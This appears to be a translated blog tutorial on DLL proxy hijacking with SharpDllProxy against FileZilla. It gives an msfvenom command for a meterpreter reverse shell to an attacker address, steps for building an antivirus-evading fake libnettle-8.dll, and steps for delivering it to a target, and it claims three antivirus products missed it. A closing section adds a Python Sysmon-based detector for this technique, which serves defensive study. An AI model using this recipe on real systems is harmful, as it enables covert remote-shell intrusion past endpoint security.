DLL proxy forwarding with weiquan

DLL hijacking

Since Windows 7 the system uses KnownDLLs to manage a set of DLLs, listed in the registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. A DLL listed there will not be loaded from the directory of the exe itself; it is only loaded from the system directory (System32). But not every DLL is written into this key, and that is where DLL hijacking comes in.

A DLL generated directly with msfvenom is killed (flagged) by antivirus straight away.

SharpDllProxy

At first hearing, the name sounds like something similar to a SOCKS proxy, but it is not.
Tool source: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. For the specific implementation you can also refer to that expert's blog.

Foreword

First understand how a dynamic link library works. If application A wants to use the GetFunkyData() function in the dynamic link library DataFunctions.dll, it has to load DataFunctions.dll. This tool builds on that: it creates a fake DataFunctions.dll with the same name, which does two things: ① it forwards every exported function to the genuine DataFunctions.dll (which is where the "proxy" in the name comes from); ② the fake DataFunctions.dll also carries the shellcode. The author's original diagram:

Experiment procedure

Target program

This experiment took some time. With a target such as FileZilla, how do you find the DLL that needs to be loaded? As the author says, copy the program out of its install directory on its own and run it; it will tell you which DLL is missing, as follows:

This means the application needs that DLL file in order to run, so we make a fake libnettle-8.dll for this DLL.

Generate shellcode

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin

Experiment start

First download SharpDllProxy: https://github.com/Flangvik/SharpDllProxy, then compile it with Visual Studio 2019. Try not to use other versions: I used Visual Studio 2017, hit all sorts of errors and could not get it to build for a long time; there may also have been a problem with my environment.

Open the SharpDllProxy solution file directly in VS, then build the solution.

Generate the fake libnettle-8.dll with SharpDllProxy.exe. Put shell.bin and the DLL to be faked into the directory above, then run the following command: .\SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin

The output contains a C file and a DLL; this DLL is the original libnettle-8.dll file, renamed.

Let's analyse this C program. Lines 9 to 494 are the DLL forwarding part: every exported function the application may call is forwarded to the original DLL for processing.

Line 497 is where the shellcode is inserted; this is the only key piece of code. In fact the shellcode shell.bin could be written directly into the file, which reduces the number of suspicious files. Here the shellcode is read in as binary and then executed through VirtualAlloc memory operations. From this point on you are free to improvise and apply the various AV-evasion techniques, such as changing the loading method, or encrypting the shellcode first and decrypting it at run time.

Compile the C file above with VS: File -> New -> Project -> Dynamic Link Library, with the project name libnettle-8. Copy the C code above into the project and build it in VS.

Send the three files above (tmpD475.dll, libnettle-8.dll, shell.bin) to the target system, start the msf listener, then run the program; the session comes back.

The most commonly used antivirus products, 360, Huorong and Security Manager, did not detect it.
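Since those three products did not flag the files, behaviour is a more reliable place to look for this technique. The following Python script is an added example, not code from the original post or from SharpDllProxy: it runs over constructed Sysmon Event ID 7 (Image Loaded) records flattened to key=value lines (PIDs and paths are made up) and flags a process that loads a DLL and then a tmpXXXX.dll from the same directory, which is the forwarding DLL pulling in the renamed original, plus any unsigned DLL loaded from the application's own directory.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample Sysmon Event ID 7 (Image Loaded) records, flattened to one
# "key=value" line each. PIDs and paths are made up for this example.
SAMPLE_EVENTS = r"""
ProcessId=4120 Image=C:\Users\bob\Desktop\fz\filezilla.exe ImageLoaded=C:\Windows\System32\kernel32.dll Signed=true
ProcessId=4120 Image=C:\Users\bob\Desktop\fz\filezilla.exe ImageLoaded=C:\Users\bob\Desktop\fz\libnettle-8.dll Signed=false
ProcessId=4120 Image=C:\Users\bob\Desktop\fz\filezilla.exe ImageLoaded=C:\Users\bob\Desktop\fz\tmpD475.dll Signed=false
ProcessId=5080 Image=C:\Program Files\FileZilla\filezilla.exe ImageLoaded=C:\Program Files\FileZilla\libnettle-8.dll Signed=false
ProcessId=5080 Image=C:\Program Files\FileZilla\filezilla.exe ImageLoaded=C:\Windows\System32\advapi32.dll Signed=true
"""

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
# SharpDllProxy renames the genuine DLL to tmp<4 hex digits>.dll next to the proxy.
TMP_NAME_RE = re.compile(r"^tmp[0-9a-f]{4}\.dll$", re.IGNORECASE)

def parse_events(text):
    """Turn each non-empty line into a dict of Sysmon fields."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]

def split_path(path):
    """Return (lower-cased directory, file name) of a Windows path."""
    p = PureWindowsPath(path)
    return str(p.parent).lower(), p.name

def find_proxy_dll_loads(events):
    """(pid, proxy_dll, renamed_original) for every process that loads a DLL and
    later loads a tmpXXXX.dll from the same directory: the forwarding DLL pulling
    in the renamed original. Loads from other directories are ignored."""
    loads = defaultdict(list)  # pid -> [(dir, name), ...] in event order
    for ev in events:
        loads[ev["ProcessId"]].append(split_path(ev["ImageLoaded"]))
    findings = []
    for pid, seq in loads.items():
        for i, (d, name) in enumerate(seq):
            if TMP_NAME_RE.match(name):
                findings += [(pid, prev, name) for prev_dir, prev in seq[:i]
                             if prev_dir == d and not TMP_NAME_RE.match(prev)]
    return findings

def find_unsigned_sideloads(events):
    """(pid, dll) for unsigned DLLs loaded from the process image's own directory,
    the location an application-directory hijack loads from."""
    return [(ev["ProcessId"], split_path(ev["ImageLoaded"])[1]) for ev in events
            if ev["Signed"].lower() == "false"
            and split_path(ev["ImageLoaded"])[0] == split_path(ev["Image"])[0]]
```

The proxy-pair rule is the stronger signal; the unsigned-sideload rule will also list legitimate unsigned application DLLs, so treat it as context for the first rather than an alert on its own.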


Origin blog.csdn.net/text2206/article/details/129879089